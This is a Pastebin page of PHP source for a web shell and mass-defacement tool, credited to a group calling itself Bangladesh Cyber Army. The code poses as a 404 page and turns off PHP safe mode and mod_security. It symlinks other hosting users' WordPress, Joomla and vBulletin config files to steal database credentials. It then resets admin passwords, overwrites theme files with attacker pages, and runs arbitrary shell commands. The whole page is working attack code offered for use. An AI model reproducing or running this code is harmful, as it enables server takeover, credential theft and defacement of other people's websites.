API tools faq
paste
AnonYmous-IQ

Bangladesh Cyber Army

AnonYmous-IQ
Sep 18th, 2017
587
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 43.44 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. $auth_pass = "";
  3. $color = "#00ff00";
  4. $default_action = 'FilesMan';
  5. @define('SELF_PATH','__FILE__');
  6. if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
  7. header('HTTP/1.0 404 Not Found');
  8. exit;
  9. }
  10. @session_start();
  11. @error_reporting(0);
  12. @ini_set('error_log',NULL);
  13. @ini_set('log_errors',0);
  14. @ini_set('max_execution_time',0);
  15. @set_time_limit(0);
  16. @set_magic_quotes_runtime(0);
  17. @define('VERSION','2.1');
  18. if( get_magic_quotes_gpc() ) {
  19. function stripslashes_array($array) {
  20. return is_array($array) ?array_map('stripslashes_array',$array) : stripslashes($array);
  21. }
  22. $_POST = stripslashes_array($_POST);
  23. }
  24. function printLogin() {
  25. ;echo '
  26. <h1>Not Found</h1>
  27. <p>The requested URL was not found on this server.</p>
  28. <hr>
  29. <address>Apache Server at ';echo $_SERVER['HTTP_HOST'];echo ' Port 80</address>
  30.    <style>
  31.        input { margin:0;background-color:#fff;border:1px solid #fff; }
  32.    </style>
  33.    <center>
  34.    <form method=post>
  35.    <input type=password name=pass>
  36.    </form></center>
  37.    ';
  38. exit;
  39. }
  40. if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
  41. if( empty( $auth_pass ) ||
  42. ( isset( $_POST['pass'] ) &&( md5($_POST['pass']) == $auth_pass ) ) )
  43. $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  44. else
  45. printLogin();
  46. @ini_set('error_log',NULL);
  47. @ini_set('log_errors',0);
  48. @ini_set('max_execution_time',0);
  49. @set_time_limit(0);
  50. @set_magic_quotes_runtime(0);
  51. $enable_wp = true;
  52. $enable_joomla = true;
  53. $enable_vb = false;
  54. $enable_phpbb = false;
  55. $enable_ipb = false;
  56. if(isset($_SESSION['safechk'])){
  57. if(ini_get('safe_mode') or ini_get('disable_functions') or !ini_get('allow_url_fopen')){
  58. $byphp = "safe_mode = Off
  59. disable_functions =
  60. safe_mode_gid = OFF
  61. open_basedir = OFF
  62. allow_url_fopen = On";
  63. $byht = "<IfModule mod_security.c>
  64. SecFilterEngine Off
  65. SecFilterScanPOST Off
  66. SecFilterCheckURLEncoding Off
  67. SecFilterCheckUnicodeEncoding Off
  68. </IfModule>";
  69. file_put_contents("php.ini",$byphp);
  70. file_put_contents(".htaccess",$byht);
  71. $_SESSION['safechk'] = "done";
  72. die("PHP Safe Mode ByPassed. Please Refresh This page");
  73. }
  74. }
  75. function convertByte($s) {
  76. if($s >= 1073741824)
  77. return sprintf('%1.2f',$s / 1073741824 ).' GB';
  78. elseif($s >= 1048576)
  79. return sprintf('%1.2f',$s / 1048576 ) .' MB';
  80. elseif($s >= 1024)
  81. return sprintf('%1.2f',$s / 1024 ) .' KB';
  82. else
  83. return $s .' B';
  84. }
  85. function curPageURL() {
  86. $pageURL = 'http';
  87. if ($_SERVER["HTTPS"] == "on") {$pageURL .= "s";}
  88. $pageURL .= "://";
  89. if ($_SERVER["SERVER_PORT"] != "80") {
  90. $pageURL .= $_SERVER["SERVER_NAME"].":".$_SERVER["SERVER_PORT"].$_SERVER["REQUEST_URI"];
  91. }else {
  92. $pageURL .= $_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
  93. }
  94. return $pageURL;
  95. }
  96. function chkDis($link,$str){
  97. $lol = get_headers($link,1);
  98. if(strpos($lol[0],"200")){
  99. $nan = file_get_contents($link);
  100. if(strpos($nan,$str)){
  101. return true;
  102. }else{return false;}
  103. }else{return false;}
  104. }
  105. function getDnamed(){
  106. if(is_readable("/var/named")){
  107. $list = scandir("/var/named");
  108. foreach($list as $domain){
  109. if(strpos($domain,".db")){
  110. $i += 1;
  111. $domain = str_replace('.db','',$domain);
  112. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
  113. $dn[$owner['name']] = $domain;
  114. }
  115. }
  116. }
  117. return $dn;
  118. }
  119. function chkSys($link){
  120. $sys_arr = array("WordPress"=>array("l"=>"wp-config.php","s"=>"WordPress"),
  121. "Joomla"=>array("l"=>"configuration.php","s"=>"JConfig"),
  122. );
  123. foreach($sys_arr as $k=>$dan){
  124. if(chkDis($link.$dan['l'],$dan['s'])){
  125. return array('link'=>$link.$dan['l'],'cms'=>$k);
  126. }
  127. }
  128. }
  129. function EloFind($str,$start,$end){
  130. $len = strlen($str);
  131. $start_pos = (strpos($str,$start) +strlen($start));
  132. $str = substr($str,$start_pos);
  133. $end_pos = strpos($str,$end);
  134. $str = substr($str,0,$end_pos);
  135. return $str;
  136. }
  137. function GetPage($url,$cookie,$post = null,$head = true) {
  138. $ch = curl_init();
  139. curl_setopt($ch,CURLOPT_URL,$url);
  140. curl_setopt($ch,CURLOPT_HEADER,$head);
  141. curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);
  142. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
  143. curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,true);
  144. curl_setopt($ch,CURLOPT_SSL_VERIFYHOST,2);
  145. curl_setopt($ch,CURLOPT_USERAGENT,$_SERVER['HTTP_USER_AGENT']);
  146. curl_setopt($ch,CURLOPT_COOKIEFILE,$cookie);
  147. curl_setopt($ch,CURLOPT_COOKIEJAR,$cookie);
  148. If ($post != NULL){
  149. curl_setopt($ch,CURLOPT_POST,1);
  150. curl_setopt($ch,CURLOPT_POSTFIELDS,$post);
  151. }
  152. $urlPage = curl_exec($ch);
  153. if(curl_errno($ch)){
  154. echo curl_error($ch);
  155. }
  156. curl_close($ch);
  157. return($urlPage);
  158. }
  159. function throwErr($str){
  160. $arr = array("status"=>"error","msg"=>$str);
  161. die(json_encode($arr));
  162. }
  163. function add2file($file,$str){
  164. if(file_exists($file)){
  165. $do = file_get_contents($file);
  166. if(!strpos($do,$str)){
  167. file_put_contents($file,$str,FILE_APPEND);
  168. }
  169. }else{
  170. file_put_contents($file,$str,FILE_APPEND);
  171. }
  172. }
  173. function doXploitWP($cnf,$html,$npass){
  174. $success = false;
  175. $str = file_get_contents($cnf);
  176. if(preg_match('%DB_USER%',$str)){
  177. $username=EloFind($str,"define('DB_USER', '","');");
  178. $password=EloFind($str,"define('DB_PASSWORD', '","');");
  179. $dbname=EloFind($str,"define('DB_NAME', '","');");
  180. $prefix=EloFind($str,"table_prefix  = '","'");
  181. $link=mysql_connect("localhost",$username,$password) ;
  182. if ($link) {
  183. mysql_select_db($dbname,$link) ;
  184. $req1 =mysql_query("UPDATE `".$prefix."users` SET `user_login` = 'admin',`user_pass` = '$1$42REgxSR$.tLV4PSbQmCKsisyCSyhq.' WHERE `ID` =1 LIMIT 1 ;");
  185. $req =mysql_query("SELECT * from  `".$prefix."options` WHERE option_name='home'");
  186. $data = mysql_fetch_array($req);
  187. $site_url=$data["option_value"];
  188. }else{
  189. throwErr("Mysql Fail");
  190. }
  191. $status['site'] = $site_url;
  192. $cookie = 'cookie/'.md5($cnf).'.txt';
  193. @unlink($cookie);
  194. $logged_in = true;
  195. $url = $site_url."/wp-login.php";
  196. $postme = 'log=admin&pwd=123456789&rememberme=forever&wp-submit=Log In&testcookie=1';
  197. $logme = GetPage($url,$cookie,$postme);
  198. if(!preg_match('%logout%',$logme)){
  199. file_put_contents("login.txt",$site_url.$logme);
  200. throwErr("Login Error");
  201. }
  202. if($logged_in){
  203. $url = $site_url."/wp-admin/theme-editor.php";
  204. $themeditor = GetPage($url,$cookie,null);
  205. $nola = explode(Chr(10),$themeditor);
  206. foreach($nola as $nline){
  207. if(preg_match('%theme-editor\.php\?file=%',$nline) &&preg_match('%\((index\.php|home\.php|404\.php|archive\.php|comment\.php)\)%',strtolower($nline))){
  208. $modify[EloFind($nline,'(',')')] = EloFind($nline,'<a href="','"');
  209. }
  210. }
  211. if(is_array($modify)){
  212. foreach($modify as $met=>$indfile){
  213. $nri = str_replace('.','_',$met);
  214. $nri = "n".$nri;
  215. if($_POST[$nri] == "on"&&(!$success OR $met == "index.php")){
  216. $indfile =str_replace("&amp;","&",$indfile);
  217. $url = trim($site_url."/wp-admin/".$indfile);
  218. $themepage = GetPage($url,$cookie,"");
  219. $_wpnonce = EloFind($themepage,'name="_wpnonce" value="','"');
  220. $_file = EloFind($themepage,'name="file" value="','"');
  221. $nfile = explode('themes',$_file);
  222. $jfile = $site_url."/wp-content/themes".end($nfile);
  223. $url = $site_url."/wp-admin/theme-editor.php";
  224. $postme = "newcontent=".urlencode($html)."&action=update&file=".$_file."&_wpnonce=".$_wpnonce."&submit=Update File";
  225. $themedied = GetPage($url,$cookie,$postme);
  226. if(preg_match('%<div id=\"message\" class=\"updated\">%',$themedied)){
  227. if(!$success){
  228. add2file("wp_site.txt",$jfile.Chr(10));
  229. }
  230. $success = true;
  231. if($met == "index.php"){
  232. add2file("wp_index.txt",$site_url.Chr(10));
  233. }
  234. }else{
  235. $error = true;
  236. }
  237. }
  238. }
  239. }else{
  240. throwErr("No file found");
  241. }
  242. if($success){
  243. $url = trim($site_url."/wp-admin/profile.php");
  244. $themepage = GetPage($url,$cookie,"");
  245. $_wpnonce = EloFind($themepage,'name="_wpnonce" value="','"');
  246. $url = trim($site_url."/wp-admin/profile.php");
  247. $postme = "_wpnonce=".$_wpnonce."&_wp_http_referer=%2Fwp-admin%2Fprofile.php%3Fupdated%3Dtrue&from=profile&checkuser_id=1&admin_color=fresh&admin_bar_front=1&first_name=&last_name=&nickname=admin&display_name=BdBlackHat&email=anonymousiq87@gmail.com&url=&aim=&yim=&jabber=&description=&pass1=".$npass."&pass2=".$npass."&action=update&user_id=1&submit=Update+Profile";
  248. $themepage = GetPage($url,$cookie,$postme);
  249. $status['status'] = "success";
  250. die(json_encode($status));
  251. }
  252. else{
  253. if($error){
  254. throwErr("Could't Update the file");
  255. }else{
  256. throwErr("Selected file not found");
  257. }
  258. }
  259. }
  260. }else{
  261. throwErr("Config not found");
  262. }
  263. return true;
  264. }
  265. function doXploitJM($cnf,$html,$npass){
  266. function joomlaCom($site_url,$cookie,$site){
  267. if($_POST['com_install'] == "on"){
  268. $url = $site_url ."/index.php?option=com_installer";
  269. $compage = GetPage($url,$cookie);
  270. preg_match('%type=\"hidden\" name=\"(\w+)\" value=\"1\"%',$compage,$dhash);
  271. $hash = $dhash[1];
  272. preg_match_all('#value="/(.*?)"#s',$compage,$path);
  273. foreach($path[0] as $pathx){
  274. $pathx=ereg_replace('value="','',$pathx);
  275. $pathx=ereg_replace('"','',$pathx);
  276. }
  277. $dir = getcwd()."/bca.html";
  278. $postme = array("install_package"=>"@".$dir ,"install_directory"=>"".$pathx."","install_url"=>"http://","type"=>"","installtype"=>"upload","task"=>"doInstall","option"=>"com_installer","".$hash.""=>"1");
  279. $url = $site_url ."/index.php?option=com_installer";
  280. $com_shell = GetPage($url,$cookie,$postme);
  281. if(preg_match('#<li>Unknown Archive Type</li>#s',$com_shell)){
  282. add2file("jm_site.txt",$site."/tmp/bca.html".Chr(10));
  283. $status['site'] = $site."/tmp/bca.html";
  284. $status['status'] = "success";
  285. die(json_encode($status));
  286. }else{
  287. return false;
  288. }
  289. }
  290. return true;
  291. }
  292. $str = file_get_contents($cnf);
  293. if(preg_match('%(JConfig|mosConfig)%',$str)){
  294. if(preg_match('%JConfig%',$str)){
  295. $username=EloFind($str,"\$user = '","'");
  296. $password=EloFind($str,"\$password = '","'");
  297. $dbname=EloFind($str,"\$db = '","'");
  298. $prefix=EloFind($str,"\$dbprefix = '","'");
  299. $pwd = md5($npass);
  300. if($_POST['domain'] != "..."){
  301. $site_url = $_POST['domain'];
  302. $site_url = "http://".$site_url;
  303. }else{
  304. $mailto = EloFind($str,"\$mailfrom = '","'");
  305. $siteul = explode('@',$mailto);
  306. $site_url = "http://".$siteul[1];
  307. }
  308. }elseif(preg_match('%mosConfig%',$str)){
  309. $username=EloFind($str,"\$mosConfig_user = '","'");
  310. $password=EloFind($str,"\$mosConfig_password = '","'");
  311. $dbname=EloFind($str,"\$mosConfig_db = '","'");
  312. $prefix=EloFind($str,"\$mosConfig_dbprefix = '","'");
  313. $pwd = md5($npass);
  314. if($_POST['domain'] != "..."){
  315. $site_url = $_POST['domain'];
  316. $site_url = "http://".$site_url;
  317. }else{
  318. $mailto = EloFind($str,"\$mosConfig_mailfrom = '","'");
  319. $siteul = explode('@',$mailto);
  320. $site_url = "http://".$siteul[1];
  321. }
  322. }
  323. $site = $site_url;
  324. $site_url = $site_url."/administrator/";
  325. $cookie = 'cookie/'.md5($cnf).'.txt';
  326. @unlink($cookie);
  327. $link=mysql_connect("localhost",$username,$password) ;
  328. if ($link) {
  329. mysql_select_db($dbname,$link);
  330. $changepass = mysql_query("UPDATE ".$prefix."users SET username ='admin' , block ='0' , password = '".$pwd."'");
  331. $doit =mysql_query("SELECT * from  `".$prefix."extensions` ");
  332. if($doit){
  333. if($_POST['ignore_def'] == "on"){
  334. $req =mysql_query("SELECT * from  `".$prefix."template_styles` WHERE client_id='0' and home='0'");
  335. $data = mysql_fetch_array($req);
  336. $template_name=$data["template"];
  337. if(strlen($template_name) <1){
  338. $req =mysql_query("SELECT * from  `".$prefix."template_styles` WHERE client_id='0' and home='1'");
  339. $data = mysql_fetch_array($req);
  340. $template_name=$data["template"];
  341. }
  342. }
  343. else{
  344. $req =mysql_query("SELECT * from  `".$prefix."template_styles` WHERE client_id='0' and home='1'");
  345. $data = mysql_fetch_array($req);
  346. $template_name=$data["template"];
  347. }
  348. $req =mysql_query("SELECT * from  `".$prefix."extensions` WHERE name='".$template_name."'");
  349. $data = mysql_fetch_array($req);
  350. $template_id=$data["extension_id"];
  351. $url = $site_url ."index.php";
  352. $login_page = GetPage($url,$cookie);
  353. $rhash = EloFind($login_page,'type="hidden" name="return" value="','"');
  354. preg_match('%type=\"hidden\" name=\"(\w+)\" value=\"1\"%',$login_page,$dhash);
  355. $hash = $dhash[1];
  356. $url = $site_url ."index.php";
  357. $postme = "username=admin&passwd=".$npass."&usrname=admin&pass=".$npass."&submit=Login&option=com_login&lang=en-GB&task=login&return=".$rhash."&".$hash."=1";
  358. $logginin = GetPage($url,$cookie,$postme);
  359. if(preg_match('%logout|index2\.php%',$logginin)){
  360. $logged_in = true;
  361. }
  362. if(!$logged_in){
  363. file_put_contents("jm_login1.6".md5($site_url).".txt",$site_url.$logginin);
  364. throwErr("Login Error");
  365. }
  366. if($logged_in){
  367. joomlaCom($site_url,$cookie,$site);
  368. $url=$site_url."/index.php?option=com_templates&task=source.edit&id=".base64_encode($template_id.":index.php");
  369. $themepage = GetPage($url,$cookie);
  370. if(preg_match('%type=\"hidden\" name=\"\w+\" value=\"1\"%',$themepage)){
  371. preg_match('%type=\"hidden\" name=\"(\w+)\" value=\"1\"%',$themepage,$dhash);
  372. $hash = $dhash[1];
  373. $url = $site_url."/index.php?option=com_templates&layout=edit";
  374. $postme = "jform[source]=".urlencode($html)."&jform[filename]=index.php&jform[extension_id]=".$template_id."&".$hash."=1&task=source.save";
  375. $themeedit = GetPage($url,$cookie,$postme);
  376. if(preg_match('%class=\"message message\"%',$themeedit)){
  377. add2file("jm_site.txt",$site."/templates/".$template_name."/index.php".Chr(10));
  378. add2file("jm_index.txt",$site.Chr(10));
  379. if($_POST['ignore_def'] == "on"){
  380. $status['site'] = $site."/templates/".$template_name."/index.php";
  381. }else{
  382. $status['site'] = $site;
  383. }
  384. $status['status'] = "success";
  385. die(json_encode($status));
  386. }
  387. else{
  388. throwErr("Update failed");
  389. }
  390. }
  391. else{
  392. throwErr("Index not found");
  393. }
  394. }
  395. }else{
  396. $req =mysql_query("SELECT * from  `".$prefix."templates_menu` WHERE client_id='0'");
  397. $data = mysql_fetch_array($req);
  398. $template_name=$data["template"];
  399. $url = $site_url ."index.php";
  400. $login_page = GetPage($url,$cookie);
  401. preg_match('%type=\"hidden\" name=\"(\w+)\" value=\"1\"%',$login_page,$dhash);
  402. $hash = $dhash[1];
  403. $postme = "username=admin&passwd=".$npass."&usrname=admin&lang=en-GB&pass=".$npass."&submit=Login&option=com_login&task=login&".$hash."=1";
  404. $url = $site_url ."index.php";
  405. $logginin = GetPage($url,$cookie,$postme);
  406. if(preg_match('%logout|index2\.php%',$logginin)){
  407. $logged_in = true;
  408. }
  409. if(!$logged_in){
  410. file_put_contents("jm_login1.5".md5($site_url).".txt",$site_url.$logginin);
  411. throwErr("Login Error");
  412. }
  413. if($logged_in){
  414. joomlaCom($site_url,$cookie,$site);
  415. if(preg_match('%index2\.php%',$logginin)){
  416. $url = $site_url ."index2.php";
  417. $logginin = GetPage($url,$cookie);
  418. preg_match('%type=\"hidden\" name=\"(\w+)\" value=\"1\"%',$logginin,$dhash);
  419. $hash = $dhash[1];
  420. $url = $site_url ."/index2.php";
  421. $postme = "doPreview=on&cid%5B%5D=".$template_name."&limit=30&limitstart=0&option=com_templates&task=edit_source&boxchecked=1&hidemainmenu=1&client=0&".$hash."=1";
  422. $themepage = GetPage($url,$cookie,$postme);
  423. if(preg_match('%type=\"hidden\" name=\"(\w+)\" value=\"1\"%',$themepage)){
  424. preg_match('%type=\"hidden\" name=\"(\w+)\" value=\"1\"%',$themepage,$dhash);
  425. $hash = $dhash[1];
  426. $url=$site_url."/index2.php";
  427. $postme = "filecontent=".urlencode($html)."&template=".$template_name."&option=com_templates&task=save_source&client=0&".$hash."=1";
  428. $themeedit = GetPage($url,$cookie,$postme);
  429. if(preg_match('%Template Manager%',$themeedit)){
  430. add2file("jm_site.txt",$site."/templates/".$template_name."/index.php".Chr(10));
  431. add2file("jm_index.txt",$site.Chr(10));
  432. $status['site'] = $site;
  433. $status['status'] = "success";
  434. die(json_encode($status));
  435. }
  436. else{
  437. file_put_contents("jmupd.txt",$site_url.$themeedit);
  438. throwErr($template_name);
  439. }
  440. }else{
  441. throwErr("Index not found");
  442. }
  443. }
  444. else{
  445. preg_match('%type=\"hidden\" name=\"(\w+)\" value=\"1\"%',$logginin,$dhash);
  446. $hash = $dhash[1];
  447. $url = $site_url ."/index.php?option=com_templates&task=edit_source&client=0&id=".$template_name."&".$hash."=1";
  448. $themepage = GetPage($url,$cookie);
  449. if(preg_match('%type=\"hidden\" name=\"(\w+)\" value=\"1\"%',$themepage)){
  450. preg_match('%type=\"hidden\" name=\"(\w+)\" value=\"1\"%',$themepage,$dhash);
  451. $hash = $dhash[1];
  452. $url=$site_url."/index.php?option=com_templates&layout=edit";
  453. $postme = "filecontent=".urlencode($html)."&id=".$template_name."&cid[]=".$template_name."&".$hash."=1&task=save_source&client=0";
  454. $themeedit = GetPage($url,$cookie,$postme);
  455. if(preg_match('%class=\"message message fade\"%',$themeedit)){
  456. add2file("jm_site.txt",$site."/templates/".$template_name."/index.php".Chr(10));
  457. add2file("jm_index.txt",$site.Chr(10));
  458. $status['site'] = $site;
  459. $status['status'] = "success";
  460. die(json_encode($status));
  461. }
  462. else{
  463. file_put_contents("jmupd.txt",$site_url.$themeedit);
  464. throwErr($template_name);
  465. }
  466. }else{
  467. throwErr("Index not found");
  468. }
  469. }
  470. }
  471. }
  472. }
  473. else{
  474. throwErr("Mysql Fail");
  475. }
  476. }
  477. else{
  478. throwErr("Config not found");
  479. }
  480. }
  481. function doXploitVB($cnf,$html){
  482. $str = file_get_contents($cnf);
  483. if(preg_match('%vBulletin%',$str)){
  484. $username=EloFind($str,"\$config['MasterServer']['username'] = '","'");
  485. $password=EloFind($str,"\$config['MasterServer']['password'] = '","'");
  486. $dbname=EloFind($str,"\$config['Database']['dbname'] = '","'");
  487. $prefix=EloFind($str,"\$config['Database']['tableprefix'] = '","'");
  488. $link=mysql_connect("localhost",$username,$password) ;
  489. if ($link) {
  490. mysql_select_db($dbname,$link);
  491. $html = str_replace('"','\\\"',$html);
  492. $query = "UPDATE template SET template = '".$html."'";
  493. $result =@ mysql_query($query);
  494. if($result){
  495. $query = "SELECT * FROM `datastore` WHERE title = 'options'";
  496. $result =@ mysql_query($query);
  497. $data = mysql_fetch_array($result);
  498. $optionz=$data["data"];
  499. $site_url = EloFind($optionz,'"bburl";s:34:"','"');
  500. $status['site'] = $site_url;
  501. $status['status'] = "success";
  502. die(json_encode($status));
  503. }else{
  504. throwErr("Update Failed");
  505. }
  506. }else{
  507. throwErr("Mysql Fail");
  508. }
  509. }else{
  510. throwErr("Config not found");
  511. }
  512. }
  513. function exme($in) {
  514. $out = '';
  515. if (function_exists('exec')) {
  516. @exec($in,$out);
  517. $out = @join("</br>",$out);
  518. }elseif (function_exists('passthru')) {
  519. ob_start();
  520. @passthru($in);
  521. $out = ob_get_clean();
  522. }elseif (function_exists('system')) {
  523. ob_start();
  524. @system($in);
  525. $out = ob_get_clean();
  526. }elseif (function_exists('shell_exec')) {
  527. $out = shell_exec($in);
  528. }elseif (is_resource($f = @popen($in,"r"))) {
  529. $out = "";
  530. while(!@feof($f))
  531. $out .= fread($f,1024);
  532. pclose($f);
  533. }
  534. return $out;
  535. }
  536. if($_POST['ac'] == "secinfo"){
  537. if(is_readable("/etc/named.conf")){
  538. echo '&raquo; /etc/named.conf is readable.<br />';
  539. }else{
  540. echo '&raquo; <font color="red">/etc/named.conf not readable</font> <br />';
  541. }
  542. if(is_readable("/etc/passwd")){
  543. echo '&raquo; /etc/passwd is readable.<br />';
  544. }else{
  545. echo '&raquo; <font color="red">/etc/passwd not readable</font> <br />';
  546. }
  547. if(is_readable("/etc/valiases")){
  548. echo '&raquo; /etc/valiases exists';
  549. if(is_array(scandir("/etc/valiases"))){
  550. echo ' & scanable';
  551. }
  552. echo '.<br />';
  553. }else{
  554. echo '&raquo; <font color="red">/etc/valiases not readable</font> <br />';
  555. }
  556. if(is_readable("/var/named")){
  557. echo '&raquo; /var/named exists';
  558. if(is_array(scandir("/var/named"))){
  559. echo ' & scanable';
  560. }
  561. echo '.<br />';
  562. }else{
  563. echo '&raquo; <font color="red">/var/named not readable</font> <br />';
  564. }
  565. if(ini_get('disable_functions')){
  566. echo '&raquo; '.ini_get('disable_functions').' are disabled<br />';
  567. }
  568. if(function_exists("symlink")){
  569. echo '&raquo; Symlinking allowed<br />';
  570. }else{
  571. echo '&raquo; <font color="red">Symlinking not allowed</font> <br />';
  572. }
  573. if(is_writable("/var/tmp")){
  574. echo '&raquo; /var/tmp folder is writable<br />';
  575. }
  576. if(is_readable('/var/log')){
  577. echo '&raquo; /var/log folder is readable<br />';
  578. }
  579. die();
  580. }
  581. elseif($_POST['ac'] == "sysinfo"){
  582. echo "<span style='color:red;'><strong>System:</strong></span> ".php_uname()."<br />";
  583. echo "<span style='color:red;'><strong>WebServer:</strong></span> ".$_SERVER['SERVER_SOFTWARE']."<br />";
  584. echo "<span style='color:red;'><strong>PHP version:</strong></span> ".phpversion()." on ".php_sapi_name()."<br />";
  585. $ssys = "None";
  586. if(is_dir("/usr/local/cpanel")){
  587. $ssys = "Running On Cpanel";
  588. }elseif(is_dir("/usr/local/directadmin")){
  589. $ssys = "Running On Directadmin";
  590. }
  591. echo "<span style='color:red;'><strong>Server System:</strong></span> ".$ssys."<br />";
  592. if(function_exists("disk_total_space")){
  593. echo "<span style='color:red;'><strong>Free Disk:</strong></span> ".convertByte(disk_free_space("/"))." / ".convertByte(disk_total_space("/"))."<br />";
  594. }
  595. echo "<span style='color:red;'><strong>Server IP:</strong></span> ".$_SERVER["SERVER_ADDR"]."<br />";
  596. die();
  597. }
  598. elseif($_POST['ac'] == "browse"){
  599. error_reporting(0);
  600. if($_POST['path'] != ""){
  601. $path = $_POST['path'];
  602. }else{
  603. $path = getcwd();
  604. }
  605. $filez = scandir($path);
  606. $q = 2;
  607. foreach($filez as $mfile){
  608. if($q == 2){$q = 1;}else{$q = 2;}
  609. $npath = $_POST['path'].$mfile;
  610. $stat = stat($npath);
  611. $usr = posix_getpwuid($stat['uid']);
  612. $grp = posix_getpwuid($stat['gid']);
  613. if(is_dir($npath)){
  614. $size = "Dir";
  615. }else{
  616. $size = convertByte($stat['size']);
  617. }
  618. $fperm = substr(sprintf('%o',fileperms($npath)),-4);
  619. if(!$fperm){
  620. $fperm = "<font color='red'>Restricted</font>";
  621. }elseif(is_writeable($npath)){
  622. $fperm = "<font color='#28FE14'>".$fperm."</font>";
  623. }elseif(is_readable($npath)){
  624. $fperm = "<font color='yellow'>".$fperm."</font>";
  625. }
  626. echo '<div class="filetable">
  627. <div class="tblbx'.$q.'" style="width:220px;text-align:left;"><a href="" onClick="filebrs(\''.$npath.'/\'); return false;">'.$mfile.'</a></div>
  628. <div class="tblbx'.$q.'" style="width:80px;">'.$size.'</div>
  629. <div class="tblbx'.$q.'" style="width:100px;">Modify</div>
  630. <div class="tblbx'.$q.'" style="width:100px;">'.$usr['name']."/".$grp['name'].'</div>
  631. <div class="tblbx'.$q.'" style="width:100px;">'.$fperm.'</div>
  632. <div class="tblbx'.$q.'" style="width:80px;">Action</div>
  633. </div>';
  634. }
  635. die();
  636. }
  637. elseif($_POST['ac'] == "chknamed"){
  638. error_reporting(0);
  639. if(is_readable("/etc/named.conf")){
  640. $named = file_get_contents("/etc/named.conf");
  641. preg_match_all('%zone \"(.*)\" {%',$named,$domains);
  642. foreach($domains[1] as $domain){
  643. $domain = trim($domain);
  644. $i += 1;
  645. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
  646. $dn .= "<a href='http://".$domain."'>".$domain."</a> - ".$owner['name']."<br />";
  647. }
  648. echo "Total Domains Found: ".$i."<br />".$dn;
  649. die();
  650. }
  651. elseif(is_readable("/etc/valiases")){
  652. $list = scandir("/etc/valiases");
  653. foreach($list as $domain){
  654. $i += 1;
  655. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
  656. $dn .= "<a href='http://".$domain."'>".$domain."</a> - ".$owner['name']."<br />";
  657. }
  658. echo "Total Domains Found: ".$i."<br />".$dn;
  659. die();
  660. }
  661. elseif(is_readable("/var/named")){
  662. $list = scandir("/var/named");
  663. foreach($list as $domain){
  664. if(strpos($domain,".db")){
  665. $i += 1;
  666. $domain = str_replace('.db','',$domain);
  667. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
  668. $dn .= "<a href='http://".$domain."'>".$domain."</a> - ".$owner['name']."<br />";
  669. }
  670. }
  671. echo "Total Domains Found: ".$i."<br />".$dn;
  672. die();
  673. }
  674. else{
  675. die("'/etc/named.conf' is not readable. Try scan for public_html. (:");
  676. }
  677. }
  678. elseif($_POST['ac'] == "safebypass"){
  679. $byphp = "safe_mode = Off
  680. disable_functions =
  681. safe_mode_gid = OFF
  682. open_basedir = OFF
  683. allow_url_fopen = On";
  684. $byht = "<IfModule mod_security.c>
  685. SecFilterEngine Off
  686. SecFilterScanPOST Off
  687. SecFilterCheckURLEncoding Off
  688. SecFilterCheckUnicodeEncoding Off
  689. </IfModule>";
  690. file_put_contents("php.ini",$byphp);
  691. file_put_contents(".htaccess",$byht);
  692. echo "<script>alert('Safe Mode ByPassed'); hideAll();</script>";
  693. die();
  694. }
  695. elseif($_POST['ac'] == "chkph"){
  696. if(is_readable("/etc/passwd")){
  697. if(!is_dir("bca")){
  698. @mkdir('bca',0777);
  699. }
  700. $htaccss = "Options all
  701. DirectoryIndex Sux.html
  702. AddType text/plain .php
  703. AddHandler server-parsed .php
  704.  AddType text/plain .html
  705. AddHandler txt .html
  706. Require None
  707. Satisfy Any";
  708. file_put_contents("bca/.htaccess",$htaccss);
  709. $etc = file_get_contents("/etc/passwd");
  710. $etcz = explode("\n",$etc);
  711. foreach($etcz as $etz){
  712. $etcc = explode(":",$etz);
  713. error_reporting(0);
  714. if($enable_wp){
  715. symlink('/home/'.$etcc[0].'/public_html/wp-config.php',"bca/".$etcc[0].'-WordPress.txt');
  716. symlink('/home/'.$etcc[0].'/public_html/blog/wp-config.php',"bca/".$etcc[0].'-WordPress.txt');
  717. symlink('/home/'.$etcc[0].'/public_html/wp/wp-config.php',"bca/".$etcc[0].'-WordPress.txt');
  718. }
  719. if($enable_phpbb){
  720. symlink('/home/'.$etcc[0].'/public_html/config.php',"bca/".$etcc[0].'-PhpBB.txt');
  721. }
  722. if($enable_vb){
  723. symlink('/home/'.$etcc[0].'/public_html/includes/config.php',"bca/".$etcc[0].'-vBulletin.txt');
  724. }
  725. if($enable_joomla){
  726. symlink('/home/'.$etcc[0].'/public_html/configuration.php',"bca/".$etcc[0].'-Joomla.txt');
  727. symlink('/home/'.$etcc[0].'/public_html/web/configuration.php',"bca/".$etcc[0].'-Joomla.txt');
  728. symlink('/home/'.$etcc[0].'/public_html/site/configuration.php',"bca/".$etcc[0].'-Joomla.txt');
  729. }
  730. }
  731. $lol = explode("/",curPageURL());
  732. $link = str_replace(end($lol),"",curPageURL());
  733. $str = file_get_contents($link."/bca");
  734. preg_match_all('%\w \w{4}=(\"|\')(.*)\.txt(\"|\')%',$str,$exp);
  735. if(is_array($exp[2])){
  736. $q = 2;
  737. $dmn = getDnamed();
  738. foreach($exp[2] as $sitez){
  739. if($q == 2){$q = 1;}else{$q = 2;}
  740. $j += 1;
  741. $sn = explode("-",$sitez);
  742. $domain = $dmn[$sn[0]];
  743. if($domain){
  744. $domain = "<a id='inj_dom".$j."' href='http://".$domain."'>".$domain."</a>";
  745. }else{
  746. $domain = "<a id='inj_dom".$j."' href=''>...</a>";
  747. }
  748. $nan .= '<div id="inj'.$j.'">
  749. <div class="tblbx'.$q.'" style="width:200px;cursor:pointer;background-color:#76BBEB;" id="injc'.$j.'"onClick="doToggle(\''.$j.'\');">'.$sn[0].'<input style="display:none;" type="checkbox" id="injchk'.$j.'" checked></div>
